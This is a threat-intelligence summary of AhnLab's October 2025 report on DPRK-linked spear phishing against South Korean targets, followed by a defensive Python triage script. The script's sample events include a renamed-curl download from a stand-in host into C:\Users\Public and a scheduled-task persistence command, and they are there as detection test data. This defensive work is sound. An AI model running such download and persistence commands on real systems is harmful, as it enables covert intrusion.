October 2025 APT Attack Trends Report (South Korea)
2025-11-14 • AhnLab
AhnLab’s October 2025 South Korea APT trend report shows spear phishing as the dominant observed intrusion type, with increased use of JSE files and multiple LNK-based delivery chains. The DPRK-relevant examples include lures about North Korean nuclear policy, inter-Korean civil exchange organizations, North Korean human rights group donations, and regional political or security themes. One LNK chain executes malicious PowerShell that uses the Dropbox API or Google Drive to download payloads, creates scripts and obfuscated RAT malware under locations such as Public, and ultimately runs RATs including XenoRAT and RoKRAT with capabilities such as keylogging and screen capture. Another LNK type downloads AutoIt components, copies curl.exe under another filename, and registers tasks for persistence while enabling command execution, directory listing, upload, and download functions. The report provides practical filenames, lure themes, malware families, and delivery behavior for monitoring APT activity against South Korean targets.
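
As an added example (not taken from the AhnLab report), the following Python code triages process-creation events for three behaviours the summary describes: curl.exe copied under another filename, binaries running from Public, and scheduled-task registration pointing there. Field names follow Sysmon Event ID 1; the sample events, file names, task names, URL and the reading of "Public" as `C:\Users\Public` are constructed assumptions.

```python
import ntpath  # parses Windows paths correctly on any OS

# Assumption: "Public" in the summary is read here as C:\Users\Public.
PUBLIC = "\\users\\public\\"

# Constructed sample events; field names follow Sysmon Event ID 1.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe --version"},
    {"Image": r"C:\Users\Public\Documents\svc_update.exe",
     "OriginalFileName": "curl.exe",
     "CommandLine": r"svc_update.exe -o C:\Users\Public\Documents\a.dat https://example.invalid/a"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "OriginalFileName": "schtasks.exe",
     "CommandLine": r'schtasks /create /tn "Updater" /tr "C:\Users\Public\Documents\run.exe" /sc minute /mo 5'},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "OriginalFileName": "schtasks.exe",
     "CommandLine": r'schtasks /create /tn "Backup" /tr "C:\Program Files\Backup\job.exe" /sc daily'},
]

def triage(event):
    """Return the names of the rules that one process-creation event matches."""
    image = event.get("Image", "")
    name = ntpath.basename(image).lower()
    original = event.get("OriginalFileName", "").lower()
    cmdline = event.get("CommandLine", "").lower()
    hits = []
    # PE version info still says curl.exe although the file on disk was renamed.
    if original == "curl.exe" and name != "curl.exe":
        hits.append("renamed_curl")
    # Executable launched from the world-writable Public profile.
    if PUBLIC in image.lower():
        hits.append("runs_from_public")
    # Scheduled task created whose command line references a path under Public.
    if name == "schtasks.exe" and "/create" in cmdline and PUBLIC in cmdline:
        hits.append("task_points_to_public")
    return hits

def scan(events):
    """Return (index, hits) for every event that matches at least one rule."""
    results = []
    for index, event in enumerate(events):
        hits = triage(event)
        if hits:
            results.append((index, hits))
    return results

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["Image"], hits)
```

The `renamed_curl` rule depends on the PE version resource surviving the copy, so it should be paired with the path-based rules rather than used alone.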